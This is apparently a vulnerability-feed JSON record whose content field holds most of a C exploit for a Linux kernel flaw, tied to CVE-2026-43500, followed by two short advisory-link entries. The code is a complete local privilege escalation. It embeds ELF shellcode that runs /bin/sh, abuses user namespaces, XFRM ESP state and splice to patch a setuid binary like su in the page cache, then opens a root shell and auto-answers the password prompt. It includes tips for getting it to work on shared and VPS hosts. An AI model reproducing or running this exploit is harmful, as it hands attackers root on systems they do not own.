{\n\t0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,\n\t0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,\n\t0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\t0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,\n\t0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,\n\t0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,\n\t0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,\n\t0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n};\n\nstatic int save_original(const char *path)\n{\n\tif (g_have_backup) return 0;\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0) return -1;\n\tint n = read(fd, g_backup, PAYLOAD_LEN);\n\tclose(fd);\n\tif (n != PAYLOAD_LEN) return -1;\n\tg_have_backup = 1;\n\treturn 0;\n}\n\nstatic int setup_userns_netns(void)\n{\n\tuid_t ruid = getuid();\n\tgid_t rgid = getgid();\n\n\tif (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {\n\t\tfprintf(stderr, \"unshare: %s\\n\", strerror(errno));\n\t\treturn -1;\n\t}\n\n\tint fd = open(\"/proc/self/setgroups\", O_WRONLY);\n\tif (fd >= 0) { write(fd, \"deny\\n\", 5); close(fd); }\n\n\tchar buf[128];\n\tsnprintf(buf, sizeof(buf), \"0 %u 1\", ruid);\n\tfd = open(\"/proc/self/uid_map\", O_WRONLY);\n\tif (fd < 0) return -1;\n\twrite(fd, buf, strlen(buf)); close(fd);\n\n\tsnprintf(buf, sizeof(buf), \"0 %u 1\", rgid);\n\tfd = open(\"/proc/self/gid_map\", O_WRONLY);\n\tif (fd < 0) return -1;\n\twrite(fd, buf, strlen(buf)); close(fd);\n\n\tint s = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (s >= 0) {\n\t\tstruct ifreq ifr;\n\t\tmemset(&ifr, 0, sizeof(ifr));\n\t\tstrncpy(ifr.ifr_name, \"lo\", IFNAMSIZ - 1);\n\t\tif (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) {\n\t\t\tifr.ifr_flags |= IFF_UP | IFF_RUNNING;\n\t\t\tioctl(s, SIOCSIFFLAGS, &ifr);\n\t\t}\n\t\tclose(s);\n\t}\n\treturn 0;\n}\n\nstatic void nl_put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)\n{\n\tstruct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));\n\trta->rta_type = type;\n\trta->rta_len = RTA_LENGTH(len);\n\tmemcpy(RTA_DATA(rta), data, len);\n\tnlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);\n}\n\nstatic int add_xfrm_sa(uint32_t spi, uint32_t patch_val)\n{\n\tint sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);\n\tif (sk < 0) return -1;\n\n\tstruct sockaddr_nl nl = { .nl_family = AF_NETLINK };\n\tif (bind(sk, (struct sockaddr *)&nl, sizeof(nl)) < 0) { close(sk); return -1; }\n\n\tchar buf[4096];\n\tmemset(buf, 0, sizeof(buf));\n\tstruct nlmsghdr *nlh = (struct nlmsghdr *)buf;\n\tnlh->nlmsg_type = XFRM_MSG_NEWSA;\n\tnlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;\n\tnlh->nlmsg_pid = getpid();\n\tnlh->nlmsg_seq = 1;\n\tnlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));\n\n\tstruct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);\n\txs->id.daddr.a4 = inet_addr(\"127.0.0.1\");\n\txs->id.spi = htonl(spi);\n\txs->id.proto = IPPROTO_ESP;\n\txs->saddr.a4 = inet_addr(\"127.0.0.1\");\n\txs->family = AF_INET;\n\txs->mode = XFRM_MODE_TRANSPORT;\n\txs->replay_window = 0;\n\txs->reqid = 0x1234;\n\txs->flags = XFRM_STATE_ESN;\n\txs->lft.soft_byte_limit = (uint64_t)-1;\n\txs->lft.hard_byte_limit = (uint64_t)-1;\n\txs->lft.soft_packet_limit = (uint64_t)-1;\n\txs->lft.hard_packet_limit = (uint64_t)-1;\n\txs->sel.family = AF_INET;\n\txs->sel.prefixlen_d = 32;\n\txs->sel.prefixlen_s = 32;\n\txs->sel.daddr.a4 = inet_addr(\"127.0.0.1\");\n\txs->sel.saddr.a4 = inet_addr(\"127.0.0.1\");\n\n\tchar auth_buf[sizeof(struct xfrm_algo_auth) + 32];\n\tmemset(auth_buf, 0, sizeof(auth_buf));\n\tstruct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)auth_buf;\n\tstrncpy(aa->alg_name, \"hmac(sha256)\", sizeof(aa->alg_name) - 1);\n\taa->alg_key_len = 32 * 8;\n\taa->alg_trunc_len = 128;\n\tmemset(aa->alg_key, 0xAA, 32);\n\tnl_put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, auth_buf, sizeof(auth_buf));\n\n\tchar ciph_buf[sizeof(struct xfrm_algo) + 16];\n\tmemset(ciph_buf, 0, sizeof(ciph_buf));\n\tstruct xfrm_algo *ea = (struct xfrm_algo *)ciph_buf;\n\tstrncpy(ea->alg_name, \"cbc(aes)\", sizeof(ea->alg_name) - 1);\n\tea->alg_key_len = 16 * 8;\n\tmemset(ea->alg_key, 0xBB, 16);\n\tnl_put_attr(nlh, XFRMA_ALG_CRYPT, ciph_buf, sizeof(ciph_buf));\n\n\tstruct xfrm_encap_tmpl enc;\n\tmemset(&enc, 0, sizeof(enc));\n\tenc.encap_type = UDP_ENCAP_ESPINUDP;\n\tenc.encap_sport = htons(ENC_PORT);\n\tenc.encap_dport = htons(ENC_PORT);\n\tnl_put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc));\n\n\tstruct xfrm_replay_state_esn esn;\n\tmemset(&esn, 0, sizeof(esn));\n\tesn.bmp_len = 1;\n\tesn.oseq = 0;\n\tesn.seq = REPLAY_SEQ;\n\tesn.oseq_hi = 0;\n\tesn.seq_hi = patch_val;\n\tesn.replay_window = 32;\n\tnl_put_attr(nlh, XFRMA_REPLAY_ESN_VAL, &esn, sizeof(esn) + 4);\n\n\tif (send(sk, nlh, nlh->nlmsg_len, 0) < 0) { close(sk); return -1; }\n\n\tchar rbuf[4096];\n\tint n = recv(sk, rbuf, sizeof(rbuf), 0);\n\tclose(sk);\n\tif (n < 0) return -1;\n\n\tstruct nlmsghdr *rh = (struct nlmsghdr *)rbuf;\n\tif (rh->nlmsg_type == NLMSG_ERROR) {\n\t\tstruct nlmsgerr *e = NLMSG_DATA(rh);\n\t\tif (e->error) return -1;\n\t}\n\treturn 0;\n}\n\nstatic int do_one_write(const char *path, off_t offset, uint32_t spi)\n{\n\tint sk_recv = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sk_recv < 0) return -1;\n\n\tint one = 1;\n\tsetsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));\n\n\tstruct sockaddr_in sa;\n\tmemset(&sa, 0, sizeof(sa));\n\tsa.sin_family = AF_INET;\n\tsa.sin_port = htons(ENC_PORT);\n\tsa.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\n\tif (bind(sk_recv, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(sk_recv); return -1; }\n\n\tint encap = UDP_ENCAP_ESPINUDP;\n\tif (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) { close(sk_recv); return -1; }\n\n\tint sk_send = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sk_send < 0) { close(sk_recv); return -1; }\n\tif (connect(sk_send, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(sk_send); close(sk_recv); return -1; }\n\n\tint file_fd = open(path, O_RDONLY);\n\tif (file_fd < 0) { close(sk_send); close(sk_recv); return -1; }\n\n\tint pfd[2];\n\tif (pipe(pfd) < 0) { close(file_fd); close(sk_send); close(sk_recv); return -1; }\n\n\tunsigned char hdr[24];\n\t*(uint32_t *)(hdr + 0) = htonl(spi);\n\t*(uint32_t *)(hdr + 4) = htonl(SEQ_VAL);\n\tmemset(hdr + 8, 0xCC, 16);\n\n\tstruct iovec iov = { .iov_base = hdr, .iov_len = sizeof(hdr) };\n\tif (vmsplice(pfd[1], &iov, 1, 0) != (ssize_t)sizeof(hdr))\n\t\tgoto fail;\n\n\toff_t off = offset;\n\tif (splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE) != 16)\n\t\tgoto fail;\n\n\tssize_t s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);\n\tusleep(150 * 1000);\n\n\tclose(file_fd); close(pfd[0]); close(pfd[1]);\n\tclose(sk_send); close(sk_recv);\n\treturn (s == 40) ? 0 : -1;\n\nfail:\n\tclose(file_fd); close(pfd[0]); close(pfd[1]);\n\tclose(sk_send); close(sk_recv);\n\treturn -1;\n}\n\n/* corrupt stage error codes (child maps to exit 11..13) */\n#define CORRUPT_ERR_UNSHARE 1\n#define CORRUPT_ERR_XFRM 2\n#define CORRUPT_ERR_WRITE 3\n\nstatic int corrupt_su(void)\n{\n\tif (setup_userns_netns() < 0)\n\t\treturn CORRUPT_ERR_UNSHARE;\n\tusleep(100 * 1000);\n\n\tfor (int i = 0; i < TOTAL_SAS; i++) {\n\t\tuint32_t spi = SPI_BASE + (uint32_t)i;\n\t\tuint32_t val =\n\t\t\t((uint32_t)shell_elf[i * 4 + 0] << 24) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 1] << 16) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 2] << 8) |\n\t\t\t((uint32_t)shell_elf[i * 4 + 3]);\n\t\tif (add_xfrm_sa(spi, val) < 0)\n\t\t\treturn CORRUPT_ERR_XFRM;\n\t}\n\n\tfor (int i = 0; i < TOTAL_SAS; i++) {\n\t\tuint32_t spi = SPI_BASE + (uint32_t)i;\n\t\toff_t off = PATCH_OFFSET + (off_t)i * 4;\n\t\tif (do_one_write(g_target, off, spi) < 0)\n\t\t\treturn CORRUPT_ERR_WRITE;\n\t}\n\treturn 0;\n}\n\nstatic const char *corrupt_err_msg(int code)\n{\n\tswitch (code) {\n\tcase CORRUPT_ERR_UNSHARE: return \"unshare / uid_map / lo setup failed in child\";\n\tcase CORRUPT_ERR_XFRM: return \"XFRM SA registration failed (netlink denied?)\";\n\tcase CORRUPT_ERR_WRITE: return \"splice/UDP 4500 write failed\";\n\tdefault: return \"unknown corrupt error\";\n\t}\n}\n\nstatic int target_already_patched(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0)\n\t\treturn 0;\n\tuint8_t got[8];\n\tssize_t n = pread(fd, got, sizeof(got), ENTRY_OFFSET);\n\tclose(fd);\n\tif (n != (ssize_t)sizeof(got))\n\t\treturn 0;\n\treturn memcmp(got, su_marker, sizeof(su_marker)) == 0;\n}\n\nstatic int verify_patch(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0)\n\t\treturn -1;\n\tuint8_t got[8];\n\tif (pread(fd, got, sizeof(got), ENTRY_OFFSET) != (ssize_t)sizeof(got)) {\n\t\tclose(fd);\n\t\treturn -1;\n\t}\n\tclose(fd);\n\treturn memcmp(got, su_marker, sizeof(su_marker)) == 0 ? 0 : -1;\n}\n\nstatic int run_esp_corrupt_stage(char *detail, size_t dlen)\n{\n\tpid_t cpid = fork();\n\tif (cpid < 0) {\n\t\tsnprintf(detail, dlen, \"fork: %s\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (cpid == 0) {\n\t\tint rc = corrupt_su();\n\t\t_exit(rc == 0 ? 0 : 10 + rc);\n\t}\n\tint wstatus;\n\tif (waitpid(cpid, &wstatus, 0) < 0) {\n\t\tsnprintf(detail, dlen, \"waitpid: %s\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (!WIFEXITED(wstatus)) {\n\t\tsnprintf(detail, dlen, \"child killed by signal %d\", WTERMSIG(wstatus));\n\t\treturn -1;\n\t}\n\tint est = WEXITSTATUS(wstatus);\n\tif (est != 0) {\n\t\tsnprintf(detail, dlen, \"%s\", corrupt_err_msg(est - 10));\n\t\treturn -1;\n\t}\n\tif (verify_patch(g_target) < 0) {\n\t\tsnprintf(detail, dlen,\n\t\t\t \"page cache unchanged at 0x%x (patched kernel / LSM / container?)\",\n\t\t\t ENTRY_OFFSET);\n\t\treturn -1;\n\t}\n\tdetail[0] = '\\0';\n\treturn 0;\n}\n\nstatic int target_is_su_binary(const char *path)\n{\n\tconst char *base = strrchr(path, '/');\n\tbase = base ? base + 1 : path;\n\treturn strcmp(base, \"su\") == 0;\n}\n\nstatic void exec_patched_target(void)\n{\n\tchar *envp[] = { \"TERM=xterm\", NULL };\n\texecle(g_target, g_target, NULL, envp);\n\t_exit(127);\n}\n\nstatic void exec_su_login(void)\n{\n\tstatic const char *paths[] = {\n\t\t\"/bin/su\", \"/usr/bin/su\", \"/sbin/su\", \"/usr/sbin/su\", NULL,\n\t};\n\tfor (int i = 0; paths[i]; i++)\n\t\texecl(paths[i], \"su\", \"-\", (char *)NULL);\n\texeclp(\"su\", \"su\", \"-\", (char *)NULL);\n\t_exit(127);\n}\n\nstatic int run_root_pty(void)\n{\n\tint master = posix_openpt(O_RDWR | O_NOCTTY);\n\tif (master < 0)\n\t\treturn -1;\n\tif (grantpt(master) < 0 || unlockpt(master) < 0) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\tchar *slave_name = ptsname(master);\n\tif (!slave_name) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\n\tstruct winsize ws;\n\tif (ioctl(STDIN_FILENO, TIOCGWINSZ, &ws) == 0)\n\t\tioctl(master, TIOCSWINSZ, &ws);\n\n\tpid_t pid = fork();\n\tif (pid < 0) {\n\t\tclose(master);\n\t\treturn -1;\n\t}\n\tif (pid == 0) {\n\t\tsetsid();\n\t\tint slave = open(slave_name, O_RDWR);\n\t\tif (slave < 0)\n\t\t\t_exit(127);\n\t\tioctl(slave, TIOCSCTTY, 0);\n\t\tdup2(slave, 0);\n\t\tdup2(slave, 1);\n\t\tdup2(slave, 2);\n\t\tif (slave > 2)\n\t\t\tclose(slave);\n\t\tclose(master);\n\t\tif (target_is_su_binary(g_target))\n\t\t\texec_su_login();\n\t\texec_patched_target();\n\t}\n\n\tsignal(SIGTTOU, SIG_IGN);\n\tsignal(SIGTTIN, SIG_IGN);\n\tsignal(SIGPIPE, SIG_IGN);\n\tsignal(SIGHUP, SIG_IGN);\n\n\tstruct termios saved_termios;\n\tint restore_termios = 0;\n\tif (tcgetattr(STDIN_FILENO, &saved_termios) == 0) {\n\t\tstruct termios raw = saved_termios;\n\t\tcfmakeraw(&raw);\n\t\tif (tcsetattr(STDIN_FILENO, TCSANOW, &raw) == 0)\n\t\t\trestore_termios = 1;\n\t}\n\n\tint auto_pw_sent = 0;\n\tint stdin_eof = 0;\n\tint saw_master_output = 0;\n\tint total_ms = 0;\n\tchar buf[4096];\n\n\tfor (;;) {\n\t\tstruct pollfd pfds[2] = {\n\t\t\t{ stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 },\n\t\t\t{ master, POLLIN, 0 },\n\t\t};\n\t\tint pr = poll(pfds, 2, 200);\n\t\tif (pr < 0 && errno != EINTR)\n\t\t\tbreak;\n\t\ttotal_ms += 200;\n\n\t\tif (pfds[1].revents & POLLIN) {\n\t\t\tssize_t n = read(master, buf, sizeof(buf));\n\t\t\tif (n <= 0)\n\t\t\t\tbreak;\n\t\t\tsaw_master_output = 1;\n\t\t\twrite(STDOUT_FILENO, buf, n);\n\t\t\tif (!auto_pw_sent && n < (ssize_t)sizeof(buf)) {\n\t\t\t\tbuf[n] = '\\0';\n\t\t\t\tif (strstr(buf, \"Password\") || strstr(buf, \"password\")) {\n\t\t\t\t\twrite(master, \"\\n\", 1);\n\t\t\t\t\tauto_pw_sent = 1;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif (!stdin_eof && (pfds[0].revents & POLLIN)) {\n\t\t\tssize_t n = read(STDIN_FILENO, buf, sizeof(buf));\n\t\t\tif (n <= 0)\n\t\t\t\tstdin_eof = 1;\n\t\t\telse\n\t\t\t\twrite(master, buf, n);\n\t\t}\n\t\tif (pfds[1].revents & (POLLHUP | POLLERR))\n\t\t\tbreak;\n\n\t\tif (!auto_pw_sent && !saw_master_output && total_ms >= 1500) {\n\t\t\twrite(master, \"\\n\", 1);\n\t\t\tauto_pw_sent = 1;\n\t\t}\n\n\t\tint status;\n\t\tpid_t w = waitpid(pid, &status, WNOHANG);\n\t\tif (w == pid) {\n\t\t\tfor (int i = 0; i < 5; i++) {\n\t\t\t\tstruct pollfd pf = { master, POLLIN, 0 };\n\t\t\t\tif (poll(&pf, 1, 50) <= 0)\n\t\t\t\t\tbreak;\n\t\t\t\tssize_t n = read(master, buf, sizeof(buf));\n\t\t\t\tif (n <= 0)\n\t\t\t\t\tbreak;\n\t\t\t\twrite(STDOUT_FILENO, buf, n);\n\t\t\t}\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (restore_termios)\n\t\ttcsetattr(STDIN_FILENO, TCSANOW, &saved_termios);\n\tclose(master);\n\treturn 0;\n}\n\nstatic int restore_original(void)\n{\n\tif (!g_have_backup) return -1;\n\n\t// just drop the file's page cache -> kernel reloads from disk\n\tint fd = open(g_target, O_RDONLY);\n\tif (fd < 0) return -1;\n\tposix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);\n\tclose(fd);\n\n\t// verify first 8 bytes match backup (disk copy)\n\tunsigned char cur[8];\n\tfd = open(g_target, O_RDONLY);\n\tif (fd < 0) return -1;\n\tint n = pread(fd, cur, 8, 0);\n\tclose(fd);\n\tif (n != 8) return -1;\n\tif (memcmp(cur, g_backup, 8) != 0) return -1;\n\n\treturn 0;\n}\n\nstatic void parse_args(int argc, char **argv)\n{\n\tfor (int i = 1; i < argc; i++) {\n\t\tif (!strcmp(argv[i], \"-v\") || !strcmp(argv[i], \"--verbose\"))\n\t\t\tg_verbose = 1;\n\t\telse if (argv[i][0] != '-')\n\t\t\tg_target = argv[i];\n\t}\n\tif (getenv(\"DIRTYFRAG_VERBOSE\"))\n\t\tg_verbose = 1;\n}\n\nint main(int argc, char **argv)\n{\n\tg_tty = isatty(STDOUT_FILENO);\n\tsetlinebuf(stdout);\n\tparse_args(argc, argv);\n\n\tif (getuid() == 0) {\n\t\texeclp(\"/bin/bash\", \"bash\", (char *)NULL);\n\t\t_exit(1);\n\t}\n\n\tprint_banner();\n\n\tif (check_kernel_config() < 0)\n\t\treturn 1;\n\n\tif (check_userns_runtime() < 0)\n\t\treturn 1;\n\n\tif (scan_setuid_binaries() < 0)\n\t\treturn 1;\n\n\tphase_header(4, \"ESP corrupt (XFRM/UDP 4500)\");\n\tprintf(\" %s\u2192%s target: %s%s%s\\n\\n\", C(C_DIM), C(C_RST), C(C_MAG), g_target, C(C_RST));\n\n\t{\n\t\tchar why[256];\n\t\tif (probe_target(g_target, why, sizeof(why)) < 0) {\n\t\t\tstatus_line(\"target\", 0, why);\n\t\t\tfprintf(stderr,\n\t\t\t\t\"\\n%s [!] Exploit needs read+execute on the setuid binary (open for splice).%s\\n\",\n\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\tfprintf(stderr,\n\t\t\t\t\"%s [!] Shared hosting often blocks reading /usr/bin/su even though 'find' lists it.%s\\n\",\n\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\tfprintf(stderr,\n\t\t\t\t\"%s [!] Use a full VM/VPS/lab where you can: cat %s | head -c 4%s\\n\\n\",\n\t\t\t\tC(C_YEL), g_target, C(C_RST));\n\t\t\treturn 1;\n\t\t}\n\t}\n\tstatus_line(\"target\", 1, \"setuid + readable + openable\");\n\n\tif (target_already_patched(g_target)) {\n\t\tstatus_line(\"patch\", 1, \"already patched \u2014 skip corrupt stage\");\n\t} else {\n\t\tif (save_original(g_target) < 0) {\n\t\t\tstatus_line(\"backup\", 0, \"failed to save 192 original bytes\");\n\t\t\treturn 1;\n\t\t}\n\t\tstatus_line(\"backup\", 1, \"192 bytes saved\");\n\n\t\tprintf(\"\\n%s [*] unshare userns+netns, register %d XFRM SA, splice\u2192UDP 4500...%s\\n\",\n\t\t C(C_YEL), TOTAL_SAS, C(C_RST));\n\n\t\t{\n\t\t\tchar err[256];\n\t\t\tif (run_esp_corrupt_stage(err, sizeof(err)) < 0) {\n\t\t\t\tstatus_line(\"corrupt\", 0, err[0] ? err : \"ESP path failed\");\n\t\t\t\tfprintf(stderr,\n\t\t\t\t\t\"\\n%s [!] Common on shared/VPS hosts: XFRM netlink blocked, splice restricted, or kernel patched.%s\\n\",\n\t\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\t\tfprintf(stderr,\n\t\t\t\t\t\"%s [!] Try: uname -r and test on WSL2/lab. Without userns: CVE-2026-43500 (rxrpc).%s\\n\\n\",\n\t\t\t\t\tC(C_YEL), C(C_RST));\n\t\t\t\treturn 1;\n\t\t\t}\n\t\t}\n\t\tstatus_line(\"corrupt\", 1, \"all iterations done\");\n\t\tstatus_line(\"verify\", 1, \"shellcode marker at 0x78 OK\");\n\t}\n\n\tphase_header(5, \"root shell\");\n\tprintf(\"\\n%s\", C(C_GRN));\n\tprintf(\" \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\");\n\tprintf(\" \u2551 root shell \u2014 exit to restore \u2551\\n\");\n\tprintf(\" \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\");\n\tprintf(\"%s\\n\", C(C_RST));\n\n\tprintf(\" %s\u2192%s spawn: %s%s\\n\\n\", C(C_DIM), C(C_RST), g_target, C(C_RST));\n\tif (run_root_pty() < 0) {\n\t\tstatus_line(\"pty\", 0, \"PTY failed, trying direct exec\");\n\t\texec_patched_target();\n\t\tfprintf(stderr, \"%s [!] exec %s: %s%s\\n\", C(C_RED), g_target, strerror(errno), C(C_RST));\n\t\treturn 1;\n\t}\n\n\tprintf(\"\\n%s [*] shell closed \u2014 restoring page cache...%s\\n\", C(C_YEL), C(C_RST));\n\tif (restore_original() < 0) {\n\t\tfprintf(stderr, \"%s [!] restore failed \u2014 try: echo 3 | sudo tee /proc/sys/vm/drop_caches%s\\n\",\n\t\t C(C_RED), C(C_RST));\n\t\treturn 1;\n\t}\n\tprintf(\"%s [+] target restored from disk.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n", "creation_timestamp": "2026-05-26T12:10:20.000000Z"}, {"uuid": "b5df876a-479b-42f9-a547-ba12cb3ca717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/control-systems-moxa-security-advisory-av26-509", "content": "", "creation_timestamp": "2026-05-26T05:59:13.000000Z"}, {"uuid": "fe74bf48-45e1-4985-845f-9f7b589e7241", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/mitel-security-advisory-av26-524", "content": "", "creation_timestamp": "2026-05-28T12:10:15.000000Z"}]}